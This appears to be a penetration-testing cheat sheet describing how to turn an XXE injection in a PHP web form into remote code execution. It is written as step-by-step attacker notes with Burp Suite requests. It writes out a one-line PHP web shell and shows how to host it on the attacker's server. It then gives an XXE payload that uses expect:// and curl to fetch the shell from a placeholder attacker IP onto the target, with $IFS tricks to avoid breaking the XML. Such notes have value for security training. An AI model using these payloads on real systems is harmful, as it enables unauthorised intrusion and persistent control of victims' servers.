RCE
the easiest method of gaining RCE with XXE is to look for ssh keys or attempt to utilize a hash stealing trick. however, the most efficient method is to fetch a web shell from the attacker's server and writing it to the webapp.
#once the internal XML entities are validated - use external file entities keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: 127.0.0.1
...
* submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
* forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
- the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed
#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
Request
...
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>First</name>
<tel></tel>
<email>email@email.com</email>
<message>This is a test email</message>
</root>
Response
...
HTTP/1.1 200 OK
check your email email@email.com for verification...
* the email field is reflected in the response and may be vulnerable to xxe injection#The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work
#write a basic web shell to be uploaded to the target via xxe
root@oco:~$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
root@oco:~$ sudo python3 -m http.server 8080
#perform test & exploit xxe vulnerability to gain rce
BURP > Repeater
Request
...
POST /submitDetails.php HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY webShell SYSTEM "expect://curl$IFS-O$IFS'{attackerIP}/shell.php'">
]>
<root>
<name>First</name>
<tel></tel>
<email>&webShell;</email>
<message>This is a test email</message>
</root>
* if there is an xxe vulnerability, the XML entity named 'webShell' which is referenced by &webShell;
should be replaced with the value defined (/home)
Response
...
HTTP/1.1 200 OK
check your email testCompany for verification...
...
...
* all spaces and characters that may break the XML format are replaced with $IFS (spaces)
- characters that may break the XML format include |, >, & {
- do not use these in the XML payload code
* if the HTTP response displayed the xxe reference element "webShell;"
instead of the webShell file being downloaded then the webapp isn't vulnerable
to XXE Injection.
* if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
only the ENTITY element is requiredLast updated